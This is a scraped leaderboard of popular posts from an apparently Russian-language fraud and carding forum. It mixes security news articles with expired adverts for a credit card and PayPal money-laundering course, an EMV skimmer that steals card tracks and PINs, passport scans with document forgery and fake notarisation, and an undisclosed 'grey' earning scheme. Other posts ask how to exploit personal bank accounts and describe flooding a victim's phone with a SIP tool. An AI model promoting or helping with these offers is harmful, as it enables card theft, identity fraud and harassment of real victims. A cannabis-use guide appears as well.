Таблица лидеров
-
во всех областях
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 10 сентября 2025
-
Год
10 сентября 2024 - 10 сентября 2025
-
Месяц
10 августа 2025 - 10 сентября 2025
-
Неделя
3 сентября 2025 - 10 сентября 2025
-
Сегодня
10 сентября 2025
-
Пользовательская дата
18.02.2023 - 18.02.2023
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 18.02.2023 во всех областях
-
3 балла
-
2 балла
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
Обучаем способу отмыва денег с СС(CREDIT CARD) или Paypal Схема легка в использование, прихотливости у мерча к бинам нету,paypal лезет даже с Брута. Если вы хотите начать бизнес в интернете, то это схема для вас. + схемы в том что на выходе вы получите чистые белыe деньги. В курс входит: Обучение основ кардинга Курс Анонимности Наработанная база всех контактов Сам курс работы схемы(со скринами)Затраты:5$+ваша работа и умение пользоваться гуглом. Цена: 45 000 py699.98 USD
-
2 балла
-
2 балла
-
2 балла
-
2 балла
-
2 балла
-
2 балла
-
2 балла
-
2 баллаЕсли вы пользуетесь смартфоном, то, скорее всего, уже представляете, что такое биометрические данные и как они могут облегчить жизнь. Устройства многих производителей давно научились распознавать своих владельцев по отпечаткам пальцев, а последним моделям не нужно даже этого — им достаточно «увидеть» ваше лицо. Уже скоро с помощью подобных методов распознавания личности мы сможем взять кредит в банке, получить консультацию врача или персональную скидку в магазине. Мы предлагаем разобраться в том, когда пригодятся биометрические данные. Когда соберетесь лететь за границу Многие страны, в том числе и Россия, уже сейчас собирают биометрические данные своих граждан и привязывают их к загранпаспортам. На чипы в таких документах можно записывать самую разную биометрическую информацию: от фотографии владельца до изображения радужки его глаз или отпечатков пальцев. Пока что эти данные используются в основном для безопасности: информацию, зашитую в чип, подделать крайне сложно, а ее проверка на границе занимает гораздо меньше времени (и паспортный контроль пассажиры проходят быстрее). С другой стороны, уже в ближайшем будущем биометрической информации будет достаточно, чтобы пассажиры проходили контроль вообще без документов, подтверждая свою личность отпечатками, звучанием голоса и изображением лица. Когда решите открыть счет в банке Сейчас, чтобы открыть или закрыть счет в банке, получить кредит или перевести крупную сумму, вам, скорее всего, придется ехать в отделение. Но биометрия скоро может это изменить: в России запускается Единая биометрическая система — общая база данных с биометрической информацией о гражданах. С ее помощью подтвердить свою личность и получить некоторые услуги в банке можно будет удаленно: достаточно записать видео, куда попадет ваше лицо, и аудио — с голосом. Сейчас база пополняется. То есть стоять в банковских очередях в ближайшем будущем, скорее всего, уже не придется. Когда понадобятся услуги от государства Единая биометрическая система будет использоваться не только в банках. Получать госуслуги теперь тоже станет проще. В течение трех лет система заработает и для них, и получить любую услугу, для которой сегодня нужно приехать в МФЦ, тоже можно будет откуда угодно, без паспорта и бумажных документов. Особенную роль использование биометрических данных сыграет для пенсионеров, маломобильных людей и жителей отдаленных населенных пунктов. Когда придется пойти к врачу Биометрические данные смогут стать заменой медицинским картам в больницах. Записаться на прием можно будет удаленно, а уже непосредственно на приеме врач получит историю болезни из электронной базы. Эти же биометрические данные могут пригодиться и в телемедицине: обратившись к врачу через интернет-платформу, пациент не должен будет вспоминать, какие анализы он сделал и к каким врачам сходил. Доступ ко всей этой информации специалист получит автоматически: система откроет врачу доступ к электронной карте пациента, с которым он разговаривает. Когда надоест менять пароли В идеальном мире в каждой учетной записи, сколько бы у вас их ни было, должен быть свой пароль. Он должен быть длинным, включать цифры и буквы разного регистра, а еще лучше менять его каждые несколько месяцев. Задача почти непосильная — многие годами используют одни и те же пароли для множества разных аккаунтов. Биометрия позволит обезопасить свои аккаунты гораздо более простым, но не менее надежным способом: запись голоса и изображение лица помогут входить в почту или соцсети так же просто, как разблокировать смартфон. Когда опять забудете пропуск или потеряете ключи Биометрические данные для прохода в рабочие помещения используются уже достаточно давно, но чаще в особо охраняемых зонах, куда попасть можно, только приложив к сканеру ладонь и показав камере радужную оболочку глаза. Вы все это видели в шпионских фильмах. В недалеком будущем такие системы могут быть установлены в любом офисном здании: камера у турникетов определит, что на работу пришли именно вы, и система безопасности автоматически откроет вам проход. Точно так же можно будет попасть и в свою квартиру: камера определит, что пришел владелец, и «умная дверь» откроется автоматически. Когда у вас украдут смартфон или угонят машину Представьте: вы стоите у дверей в метро и читаете новости. На очередной остановке прямо перед отправлением кто-то выхватывает у вас смартфон и убегает. Двери закрываются. Найти злоумышленника в такой ситуации довольно непростая задача — по крайней мере без использования биометрии. Если в городе установлены системы распознавания лиц, то определить, кто именно вас обокрал или, например, угнал вашу машину с парковки, становится гораздо проще. У таких систем есть и обратная сторона — заметное снижение уровня приватности. В миниатюре подобный опыт уже воплощен в Сингапуре и позволяет оценить как плюсы, так и минусы. Когда у вас не будет никаких документов Если понадобится подтвердить личность и у вас на руках не окажется никаких документов, национальная база с биометрическими данными сможет помочь. Обычно, если вы потеряли паспорт и у вас нет других удостоверяющих личность документов, восстановить его — очень длительный и трудоемкий процесс, часть которого состоит в том, чтобы доказать, что вы — это действительно вы. Если же информация о вас будет добавлена в Единую биометрическую систему, то этот процесс станет проще: подтвердить личность можно будет просто предоставив отпечатки пальцев или аудиообразец голоса. Принимает, хранит и обрабатывает данные Единой биометрической системы компания «Ростелеком». Здесь же создается специальный контрольный шаблон, который будут использовать банки, для удаленной идентификации клиентов. Когда в следующий раз отправитесь за покупками Магазины учатся обращаться с биометрией на пользу покупателям: расплатиться за покупки можно будет приложив палец к специальному терминалу со встроенным биометрическим сканером. Сегодня уже можно оплатить покупки при помощи смартфона: списание денег происходит после того, как вы подтвердите платеж отпечатком пальца. Использование биометрии напрямую, без посредника, позволит ритейлерам запоминать своих постоянных клиентов и их предпочтения в покупках, а потом — подсказывать, на какой товар каждому из них стоит обратить внимание, и формировать для каждого покупателя индивидуальные скидки. Когда захотите пойти на футбольный матч Распознавание лиц уже сегодня применяют, чтобы события с большим скоплением людей проходили безопаснее. Так, чтобы не допускать на футбольные матчи агрессивных болельщиков, используют системы идентификации по лицу: людей, попавших на записи с камер на входе в стадион, сравнивают с базой «дебоширов», которые уже устраивали беспорядки на играх. С помощью такой системы распознавания лиц уже ловили преступников, находящихся в федеральном розыске.
-
1 балл
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
Продаю серую схему заработка 90% онлайн Реальный профит от 90к в неделю. Время запуска темы 5 рабочих дней. Время которое вам нужно будет тратить 1 час утром и 1час вечером Ваши инвестиции на эту тему составят около 20к ВНИМАНИЕ только для городов с населением около 1 мил и выше (есть возможность обрабатывать любой крупный город россии если вы в таком не проживаете но тогда ваши инвестиции вырастут еще на 10к) Могу сказать что этот бизнес существует давно. но именно эта схема разработана лично мной и успешно работает в одном из годов. Ориентировочное время успешной работы темы до конца 15 года. Цена:70 000 рублей1,000.00 USD
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 балл
THIS ADVERT HAS EXPIRED!
- FOR SALE
- NEW
СКИММЕР-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ПЕРЕХВАТЫВАЕТ СООБЩЕНИЯ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS. СКИММЕР EMV ЗАПИШЕТ ИНФОРМАЦИЮ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. СКИММЕР EMV-ЭТО УСТРОЙСТВО, КОТОРОЕ ПОМЕЩАЕТСЯ ВНУТРИ БАНКОМАТА ИЛИ POS ДЛЯ ПЕРЕХВАТА СВЯЗИ МЕЖДУ ЧИПОВОЙ КАРТОЙ И СЧИТЫВАТЕЛЕМ ЧИПОВЫХ КАРТ ИЗ БАНКОМАТА ИЛИ POS И ЗАПИСИ ИНФОРМАЦИИ О КРЕДИТНОЙ КАРТЕ, ТАКИМ ОБРАЗОМ, ИНФОРМАЦИЯ О КРЕДИТНОЙ КАРТЕ БУДЕТ УКРАДЕНА. Скиммер Emv-это устройство, которое помещается внутри банкомата или POS для перехвата сообщений и записи кредитной карты между чиповой картой и считывателем чипов из банкомата или POS, таким образом, вся информация о кредитной карте похищается. У вас будет быстрый и простой трек 1, трек 2 и PIN-код со всех кредитных карт, которые используют эти банкоматы или POS. Вы можете загрузить информацию с скиммера Emv, подключив телефон или ноутбук по Bluetooth к скиммеру Emv. Такое устройство СКИММЕРА EMV может не только считывать данные владельца карты с чипа, но и перехватывать PIN-код. УСТРОЙСТВО СКИММЕРА EMV создает копию исходной карты, включая все стандартные проверки подлинности SDA-Статическая проверка подлинности данных, DDA - Динамическая проверка подлинности данных, CDA-Комбинированная проверка подлинности данных. С помощью нашего устройства EMV Скиммер вы можете очень легко получить всю информацию о кредитной карте из любого банкомата или POS. С помощью устройства СКИММЕРА EMV вы можете получить трек 1 + 2 + Pin.1,600.00 USD
-
1 балл
-
1 баллСпециалисты предупреждают о повышении мошеннической активности в связи с «черной пятницей». Эксперты Group-IB обнаружили более 400 сайтов-клонов, копирующих популярную торговую площадку AliExpress, и еще две сотни сайтов, маскирующихся под известные бренды и интернет-магазины. Целью подобных мошеннических ресурсов может быть как реализация контрафактных товаров, так и кража денег или данных банковских карт пользователей. 23 ноября стартует «черная пятница» — масштабная распродажа, с которой в США и в Европе начинается традиционный сезон рождественских скидок. В последние годы ажиотаж наблюдается не только в магазинах, где за товарами со скидками 50%-80% выстраиваются огромные очереди, но и в интернете. Только с 7 по 21 ноября Group-IB зафиксировала более 120 000 публикаций с упоминаниями этой акции в социальных сетях (97%) и на других веб-площадках (3%). Реклама «черной пятницы» появляется в социальных сетях, в постах у топовых блогеров и на самих торговых площадках. AliExpress и 400 разбойников Подобным потребительским бумом (солидные скидки действуют лишь ограниченное количество времени) активно пользуются мошенники. Они заранее создают сайты-клоны известных брендов и интернет-магазинов. Например, специалисты Group-IB обнаружили около 400 ресурсов, копирующих популярную торговую интернет-площадку AliExpress. Для привлечения внимания покупателей злоумышленники копировали сайт интернет-магазина, бренд, логотипы и фирменные цвета и регистрировали похожее доменное имя. Большинство изученных подозрительных ресурсов содержали в доменном имени различные варианты официального названия AliExpress. Ущерб для одного покупателя может достигать десятков тысяч рублей. Ежемесячно на один подобный сайт может заходить до 200 000 человек. Масштабы такой преступной деятельности огромны. Число ресурсов, запущенных одной группой мошенников, может достигать нескольких сотен. Незадолго до «черной пятницы» команда Brand Protection выявила крупную сеть подобных сайтов — 198 штук, незаконно использующих товарные знаки и бренды известных марок. Большая часть доменных имен была куплена в конце августа 2018 года и практически весь контент — фотографии товаров, их описание и цены были скопированы с официальных ресурсов. Примечательно, что все эти ресурсы имели одного и того же хостинг-провайдера — ISPIRIA Networks Ltd, находящегося в Белизе (Центральная Америка). Целью таких сайтов-клонов может быть как реклама и продвижение собственных товаров, так и реализация контрафакта. По данным Group-IB, объем онлайн-рынка торговли контрафактной продукцией в России за год вырос на 23% и составил свыше 100 млрд рублей в 2017 году, по сравнению с 81 млрд в 2016 году. Мошенники продают на своих ресурсах бытовую и компьютерную технику, одежду и обувь, ювелирные изделия, аксессуары, косметику, медицинские препараты и многое другое, зачастую с огромной скидкой — до 80%. По статистике Group-IB, каждый 5 поддельный товар был куплен в интернете, в среднем россияне на покупку контрафактной продукции тратит 5 300 рублей. Случается, что мошенники продают несуществующие товары. Например, предлагают версию игры «Red Dead Redemption 2» на ПК, несмотря на то, что игра вышла только на PlayStation 4 и Xbox One. Торжество фишинга: 1274 атаки в день Кроме того, особую опасность для покупателей представляю ресурсы, созданные злоумышленниками для кражи денег или данных (логинов, паролей, банковских карт), речь идет о фишинговых сайтах. По данным экспертов Group-IB Brand Protection, ежедневно фиксируется 1274 фишинговых атак. Всего выручка фишинговых ресурсов, использующих бренды известных компаний, в среднем за месяц работы составляет 3 млн рублей, а посетителями таких сайтов ежемесячно становятся около 200 тыс. человек. Мошенники используют те же каналы продвижения, что и легальные ресурсы: рассылку в мессенджерах, баннерную рекламу, поисковую оптимизацию (SEO) и продвижение в социальных сетях. Злоумышленники нередко, покупают домен очень схожий с оригинальными, настраивают на нем редирект и раскручивают эту ссылку. Перейдя по такой ссылке, пользователь оказывается на странице с совершенно другим адресом. «Последствиями подобного мошенничества могут быть как прямые финансовые потери, так и косвенные, в частности, репутационные. По статистике, 64% пользователей перестают покупать продукцию компании после негативного опыта. В разрезе информационной безопасности подобные ресурсы-клоны должны рассматриваться как угрозы не только пользователям, но и самой компании. Для крупных брендов работа по выявлению мошеннических сайтов должна иметь регулярный и систематический характер», — говорит Андрей Бусаргин, директор департамента инновационной защиты бренда и интеллектуальной собственности Group-IB.
-
1 баллШифровальщик Coinvault бесчинствовал в 2014-2015 годах в десятках стран по всему миру. Число его жертв, по подсчетам наших экспертов, составляет более десяти тысяч человек. За всем этим стоят два брата — голландцы 21 и 25 лет, разработавшие и распространявшие троян. С каждой жертвы они требовали по 1 биткойну, курс которого в то время составлял около 200 евро. В результате им удалось собрать порядка 20 тысяч евро на двоих. Coinvault примечателен тем, что в нем в дополнение к собственно шифрованию появились другие функции, которые мы и сегодня видим в троянах-вымогателях. Например, жертве дают возможность бесплатно расшифровать один файл. Это на руку преступникам — когда понимаешь, что от возвращения твоей информации тебя отделяет только один клик, соблазн заплатить вымогателям становится сильнее. Висящий на экране таймер, еще одна психологическая находка создателей Coinvault, неумолимо отсчитывает время до увеличения выкупа. Голландский след в коде Coinvault Авторы зловреда приложили немало сил, чтобы скрыть его от защитных решений и затруднить его анализ. Вымогатель умеет определять, например, не пытаются ли его запустить в «песочнице» — и в этом случае ничего не делать, а его код довольно тщательно обфусцирован. В контексте кибербезопасности “песочница” представляет собой строго контролируемую среду, в которой подозрительные программы или сценарии могут безопасно выполняться. Обфускация — процесс изменения кода программы, в результате которого он приобретает вид, трудный для понимания – при этом программа сохраняет свои функции. Впрочем, экспертам все же удалось добраться до исходного кода и найти в нем зацепку, которая в итоге помогла поймать преступников, — несколько комментариев на голландском языке. Он не так уж популярен среди вирусописателей, поэтому с большой уверенностью можно было предположить, что зловред родом из Нидерландов. Исследователи передали информацию голландским киберполицейским, и через несколько месяцев они смогли отчитаться об успешной поимке организаторов кампании. Явление третье: те же и Фемида Полиция собрала почти 1300 заявлений от жертв вымогателя. Некоторые пострадавшие появились в суде, чтобы лично потребовать компенсацию. Например, одному из них шифровальщик сорвал отпуск. Ущерб потерпевший оценил в 5 тысяч евро, на которые, по его словам, он смог бы все-таки поехать отдохнуть. Еще одна жертва попросила вернуть выкуп так, как он был заплачен — в биткойнах. За прошедшее время курс криптовалюты поднялся почти в 30 раз, так что если суд удовлетворит ходатайство, это будет первый случай, когда на атаке вымогателя заработала пострадавшая сторона. На прошедшем заседании представители обвинения потребовали наказания в виде трех месяцев в тюрьме с последующим девятимесячным условным сроком и 240 часами общественных работ. Адвокаты просят суд не отправлять братьев за решетку, аргументируя ходатайство тем, что подсудимые сотрудничали со следствием, а также тем, что один из них незаменим на своей нынешней работе, а второй учится в университете. Приговор станет известен на следующем заседании, 26 июля. Мораль: злоумышленники не останутся безнаказанными Мы всегда говорим, что идти на поводу у преступников — значит поощрять их. Суд над создателями Coinvault показывает, что даже якобы анонимные злодеи киберпространства не избегают наказания. Но лучше все-таки не ждать правосудия три года, а защититься от атак заранее и самостоятельно. Напоминаем стандартные советы: Не кликайте по подозрительным ссылкам и не открывайте подозрительные вложения в письмах. Регулярно делайте резервные копии файлов. Используйте надежное защитное решение.
-
1 баллЗдравствуйте! Есть счета в банках Европы( разные страны) открытые на физических лиц, могу открыть в конкретной стране, если это будет необходимо. Скажите, что можно с этими счетами провернуть? если у кого-то есть идеи или готов посотрудничать просьба написать в Telegram - @MaxAndreev01 (https://t.me/MaxAndreev01)Заранее благодарю за ответ!
-
1 балл
-
1 балл
-
1 баллВ современных реалиях обычные пользователи могут подвергаться слежке не только со стороны хакеров, а и со стороны служб государственной безопасности. Благодаря очередной утечке документов ЦРУ, опубликованной на WikiLeaks, общественности стал известен еще один способ слежки за пользователями, к которому прибегают спецслужбы в своих расследованиях. Многих пользователей может шокировать то, что обычный роутер, который у большинства людей после покупки пылится в укромном уголке квартиры, при использовании определенного программного обеспечения становится инструментом для слежки. С помощью специального инструментария агенты ЦРУ могут отслеживать ваш трафик, активность в сети, и даже получить доступ к вашему ПК и мобильным девайсам. Согласно опубликованным данным, набор эксплоитов для взлома роутеров называется CherryBlossom и содержит различные программы для поиска уязвимостей и удаленной слежки за устройствами индивида, который подвергся взлому. Инструментарий рассчитан на использование слабых мест в прошивке роутеров таких общеизвестных компаний как D-Link и Linksys. С его помощью у ЦРУ есть возможность подбирать пароли и в последствии переписывать прошивку устройств для дальнейшего шпионажа. Сложность также заключается в том, что в отличие от прямого взлома ПК или мобильного устройства пользователя, когда следы взлома могут быть заметны, получение доступа третьих лиц к роутеру очень сложно определить. Поэтому такой способ шпионажа более эффективен ввиду его скрытности. Связь со всемирной сетью работает, доступ в Интернет есть, а пользователь не подозревает о ведущейся за ним слежке. «У пользователя попросту не возникает подозрений в том, что его роутер может быть взломан. Вы получаете доступ к сети как обычно» — комментирует ситуацию основатель фирмы Hacker House и специалист по вопросам безопасности, Мэттью Хайки — «Единственное отличие в том, что вся ваша активность отслеживаются в ЦРУ». Процедура взлома, описанная в документации состоит из нескольких этапов: Запуск инструмента под названием Claymore для сканирования сети и определения модели роутера с последующим запуском эксплоитов для взлома. Запуск эксплоитов под названием Tomato и Surfside. Функционал Tomato заключается в краже административных паролей, в то время как специализация Surfside не уточняется. В документе также описано лишь предназначение эксплоитов, без описания принципов их работы. Однако эксперты полагают, что уязвимость может заключаться в нарушении протокола UPNP, отвечающего за безопасность. Следом за взломом происходит установка инструмента для мониторинга активности в интернете, который называется Flytrap. Этот инструмент отправляет в ЦРУ данные о трафике, посещенных пользователем сайтов и общей активности в сети. По такой же схеме работает и CherryTree — эксплоит с браузерным интерфейсом, с помощью которого может совершаться контроль над сетью цели. Слитые файлы датированы началом 2016 года и неизвестно, существуют ли описанные в документах уязвимости в роутерах более позднего выпуска. Известно также, что уязвимости в прошивках роутера могут быть закрыты патчами компаний-производителей. Но как часто обычный пользователь интересуется прошивкой своего роутера? Пока есть стабильный доступ в интернет, нет причин заниматься изучением возможных проблем, и уязвимости могут сохраняться годами. Таким образом неосведомленность среднестатистического пользователя о подобных возможностях хакеров и спецслужб стала серьезной уязвимостью для информационной безопасности. Однако благодаря данному сливу и освещению проблемы в СМИ все может измениться. Если вы дорожите своей безопасностью в сети, после прочтения этой статьи в первую очередь стоит зайти на сайт производителя вашего роутера, найти последнюю доступную версию прошивки и обновить роутер, закрыв таким образом доступные уязвимости.
-
1 баллLOL вот так постарался , сколько же должно быть опыта за плечами , что бы написать статью хоть немного похожую на твою
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 баллКонопля неспроста была одним из культовых растений в хиппи-культуре, провозгласившей девиз "Make love, not war". Анестетический эффект каннабиса, в противоположность алкоголю, не распространяется на приятные ощущения и не мешает потенции. Причина в том, что под действием каннабиса активнее выделяется окситоцин - если, конечно, ситуация каким-то образом располагает к интимной близости. Окситоцин - гормон, связанный за особое состоянием снижения страха и чувства доверия к ближнем. возникающее при занятиях сексом. Связан также с мышечными сокращениями матки и женским оргазмом. Производится гипоталамусом, выделяется в кровь из гипофиза. На западе всё популярнее становятся лубриканты домашнего употребления: соцветия каннабиса вымачиваются в горячем кокосовом масле, затем уже остывшее масло используется как натуральный и приятный лубрикант, оказывающий потрясное влияние на ваше восприятие в тех участках тела, на которое традиционно наносятся лубриканты. Если же каннабиноиды предполагается по старинке курить, то как и музыкальное сопровождение, сорт конопли к занятиям практической любовью нужно подбирать с учётом всех тонкостей вашего темперамента и обстановки. Разумеется, лучше всего курить вместе и непосредственно в постели - внимание человека под каннабисом по-детски непосредственно и потому непредсказуемо, и когда трава подействует на полную, вы можете и не справиться с соблазнением, если не заняться им заранее. Перейдём от приятного к приятному, разновидностям каннабиса. Сатива: главное плавность Сатива склонна тонизировать, улучшать настроение и сподвигать на активную деятельность. Она также лучше усиливает прилив крови и обостряет чувства сильнее, чем индика - попробуйте, к примеру, потереться о свою любимую под хмелем Pablo Escobar или White Widow, AK-47XL от Divine Seeds. Однако способность сативы вызывать у скованных и застенчивых людей приступы паранойи может помешать вашему взаимодействию. Употреблять сативу вместе со своей девушкой непосредственно перед сексом гарантированно не испортит процесса, если вы давно вместе практикуете оба конкретных действия. С девушкой, которую вы только начинаете узнавать поближе, чисто сативные соцветия могут и заморозить немного. Если чувствуете, что обламываетесь - не стесняйтесь сказать об этом, сменить темп. Обнимитесь, полежите вместе, и всё сложится само собой. Индика и тантра Успокоительное действие индики помогает гиперактивным людям несколько замедлится и "остановить мгновение". Главное, не перекурить настолько, чтобы кто-нибудь из участников тандема отяжелел и не смог двигаться или вообще уснул. Не стоит также упускать из виду ослабленное кровообращение под stone-эффектом - почти никогда не препятствует эрекции, но в слишком затянувшейся сцене может её на некоторое время приостановить. Если это случилось, главное не падать духом - девушки вовсе не судят человека по тому, нужна ли ему иногда пауза в сексе. Выпейте вместе кофе с шоколадкой. Побудьте романтичным, пообнимайтесь. Продолжайте, когда захочется, ведь вы не пьяны - либидо в перерывах восстанавливается само собой. Чистая индика - интересный вариант для тантрического секса, для замедления всех ритмов и растворения в любви попробуйте сорт вроде Auto Kabul или Auto Candy от Divine Seeds, Afghani Bullet того же сидбанка. Путь золотой середины Умный человек, когда дует ветер, строит не щит от него, а ветряную мельницу. Когда дует шишки - старается применить состояние на пользу, а не вхолостую. Идеальные соцветия для полнометражного свидания - средней убойности гибриды с преобладанием сативы вроде Auto Big Demon от Divine Seeds или, например, для более тяжеловесных курильщиков Opium от того же сидбанка, Auto Gagarin от Bob Marley Seeds. Если вы вдруг застеснялись, лучше об этом сказать и вместе посмеяться. Главное, из смущения не накуривать девушку сильнее себя в надежде этим помочь своей уверенности, и самому причащаться умеренно. Лучше всего курить поровну.
-
1 баллПродажа и перерисовка сканов паспортов всего мира!!! База содержит большое количество сканов,кредиток,банков многих стран мира (Европа, РФ,США, СНГ, Азия и т.д.) Комплекты по Рф, Европе,снг в большом количестве Комплекты которые я предлагаю по Европе и Миру скан+statement скан+id загран + id ssn скан +driver license + билы скан+вод.удостоверение скан+кредитка скан+фото в руках и многое другое Комплекты которые я предлагаю по Рф узнаем по указаным контактам Все сканы реал -продаются в одни руки после купли вашь скан удаляется с базы . Высокое качество сканов, также много различных документов+ комплект Возможна составление нужного вам комплекта . Также возможно выборка сканов по критериям и комплектам Также возможна найти по ФИО Нужный вам паспорт Также возможна найти по максимальному комплекту документов на определенную компанию любой страны мира. Также возможна услуга перерисовки Любых документов Перерисовка более - 100 стран, сканов ,документов,Кредиток,водительских удостоверений. Работает сервис "НОТАРИУС" заверим любые ваши документы с проводкой по базе. Оптовиками частным покупателям скидка Перед продажей показываю скан в зарисованном виде Возможно выбрать скан по вашим критериям Наши контакты ICQ для связи 4-170-84 Jabber praht@jabber.ru skype Praht_11 Telegram @PraTTT email prahtpraxt@yandex.ru
-
1 балл*Для автоматического дозвона выбираем "Гудок (ms)" Ссылки на весь нужный софт и сайты: Сам сайт - https://www.sipnet.ru Sip Killer - https://yadi.sk/d/4xUNSqs53PVfjz Виртуальный номер телефона - http://virtualsms.ru/ С помощью данного способа можно устроить настоящую DDOS атаку на телефон жертвы. Данные действия представлены лишь в ознакомительных целях, я не несу ответственность за возможные последствия такого рода хулиганства.
-
1 баллОбыск с извлечением компьютерной информации Своеобразие тактики и технических средств, применяемых для обнаружения и изъятия информации, хранящейся в оперативной памяти компьютера или на физических носителях, позволяет выделить новый вид обыска – обыск средств компьютерной техники. Такой обыск может производиться по делам о неправомерном доступе к информации, о создании вредоносных программ, о нарушении работы вычислительных комплексов, а также по любым делам, где требуется просмотр и изъятие документов, хранящихся не только на бумажных, но и на компьютерных носителях в виде файлов, подготовленных на данном компьютере, полученных с другого компьютера или отсканированных с бумажного документа. Перед обыском объекта, где по имеющейся информации находятся средства компьютерной техники (СКТ), желательно получить оперативную ориентировку по следующим вопросам: Количество СКТ на месте, где предполагается произвести обыск, наличие устройств бесперебойного питания. Сведения об используемых телекоммуникационных средствах: есть ли модем для связи компьютеров через телефонную сеть, объединены ли несколько компьютеров в локальную сеть внутри организации, имеется ли сервер – компьютер, который обслуживает остальные персональные компьютеры; есть ли подключение к региональной или глобальной сети. Часть этих сведений можно получить на основе предварительного анонимного посещения объекта, часть может сообщить провайдер – фирма – поставщик сетевых услуг. Наличие электронной связи в организации могут прояснить "шапки" бланков писем, реклама, прайс-листы и приглашения "посетить нашу Web-страницу в сети Internet". Профессиональный уровень обслуживания компьютера в организации или уровень владельца – пользователя компьютера, в том числе его профессиональные навыки в области вычислительной техники. Предусмотреть возможность или даже необходимость привлечь при обыске к сотрудничеству лицо, ответственное за эксплуатацию СКТ, а при наличии сети – сетевого администратора. Есть ли на СКТ программные или программно-аппаратные средства защиты от несанкционированного доступа. Если на СКТ имеются средства защиты, попытаться установить код доступа. Можно рассчитывать на последующие специальные приемы "взлома", поскольку некоторые популярные системы, в частности Windows, имеют слабые программные средства защиты и поддаются проникновению с использованием настроек или специальных программ. Выяснить, не защищает ли информацию электронный ключ – компактная электронная приставка размером со спичечный коробок, устанавливаемая на параллельный или последовательный порт (разъем) компьютера. Электронный ключ разрешает пользоваться защищенной программой и ее данными только при своем наличии. Возможно, компьютер защищен от доступа устройством чтения смарт-карт. Если на компьютере эти устройства предусмотрены, но в данный момент не подключены, можно предложить владельцу предъявить их добровольно или найти путем обычного обыска. Целесообразно обеспечить участие в обыске специалиста в компьютерной технике и информатике: программиста, системного аналитика, инженера по средствам связи или сетевому обслуживанию. По возможности в качестве понятых пригласить лиц, разбирающихся в компьютерной технике. В последние годы специалистов можно подобрать в солидных компьютерных фирмах с опытом услуг и преподавания на курсах по соответствующему профилю. Необходимо подготовить переносную аппаратуру для считывания и хранения изымаемой информации. С собой можно взять переносной компьютер и программное обеспечение, набор которого должен быть сформирован по совету с экспертами, а также переносные накопители информации со сменными носителями, способные вместить большой объем информации. Например: стример (ленточные кассеты), сменный жесткий диск, дисководы и диски сверхплотной записи (устройства Zip, arive, DVD) и т.п. Прийти на объект обыска лучше в момент максимального рабочего режима и срочно принимать меры по обеспечению сохранности СКТ и имеющихся на них данных. Необходимо распорядиться, чтобы персонал покинул рабочие места без прекращения работы техники и без завершения программ. Лучший вариант здесь – "оставить все как есть". На обзорной стадии обыска лицам, находящимся в помещении, запрещается прикасаться к включенным СКТ. Можно установить охрану, наблюдение, отделить находящихся на месте обыска сотрудников организации в определенной части помещения и т.д. Не разрешать выключать электроснабжение объекта. Если же электроснабжение на данный момент отключено, то перед его восстановлением желательно отключить от электросети всю компьютерную технику. Учитывается изображение, существующее на экране дисплея компьютера, если он включен. Если изображение на экране монитора выдает сообщение о текущем процессе удаления (уничтожения) информации, необходимо пойти на крайнюю меру – экстренно отключить компьютер от сети, а последующее включение провести с помощью специалиста. Необходимо занести в протокол названия программ, работавших в момент обыска, название и характер документов, с которыми шла работа. Следует определить, соединены ли СКТ, находящиеся на объекте обыска, в локальную вычислительную сеть и есть ли управляющий компьютер – сервер. Серверу нужно уделить особое внимание, так как там находится большой объем информации. Хотя и на рядовом компьютере сети (на рабочей станции) тоже может находиться собственная информация. В случае сетевого соединения с другим компьютером по внутренней сети или по глобальной - установить его сетевой адрес. Изымаются (при наличии) документы регистрации включения информационной системы и подключения к ней, журнал оператора ЭВМ, иные записи, относящиеся к работе на СКТ. В некоторых ситуациях, особенно перед изъятием, желательно составить для протокола план – эскиз помещения, указав на нем расположение СКТ. Возможно изъятие официальных планов или схем, составленных и утвержденных в самой организации. Подробно описывается порядок соединения между собой всех устройств, фиксируется наличие либо отсутствие используемого канала связи (модемы, сеть). Устанавливается тип связи, используемая в этих целях аппаратура, абонентский номер. Отмечается серийный номер (если он доступен) компьютера и его индивидуальные признаки. Рекомендуется исследовать, а при необходимости приобщать к делу магнитные носители информации: дискеты и жесткие диски, кассеты ленточных стримеров. В последнее время избранная информация может записываться по инициативе владельца на лазерный диск, поэтому при наличии таких дисков их тоже можно исследовать. В отдельных случаях при обыске нужно искать тайники, где могут храниться сменные компьютерные носители информации; с помощью специалиста вскрывать корпуса аппаратных средств компьютерной техники, чтобы обнаружить специально отключенные внутренние носители информации, например дополнительный жесткий диск. Если обыск проходит по делу о разработке программ в преступных целях, необходимо найти и изъять текст программы с компьютера или его распечатку. По делу о незаконном производстве пиратских программ для нелицензионного распространения без разрешения разработчика необходимо описать найденную "готовую продукцию", перечень программ, размещенных на лазерных дисках, попросить предъявить разрешение фирмы или автора на выпуск именно этой программной продукции. С другой стороны, в организациях при обыске можно определить по компьютеру перечень установленных программ и потребовать лицензию или другие документы, подтверждающие законность их использования. Установленной считается программа, которая извлечена из сжатого (архивного) состояния и – после прохождения этапа предупреждения о необходимости лицензионного использования ~ установлена (инсталлирована) в рабочий каталог. После выполнения указанных мероприятий можно приступить к поиску информации на компьютере. Машинные носители информации не читаемы визуально. В связи с этим следователь стоит перед дилеммой: изымать все СКТ "вслепую" и разбираться, есть ли на них значимая для дела информация после завершения обыска, или изучить с помощью специалиста на месте обыска содержащуюся на СКТ информацию, чтобы 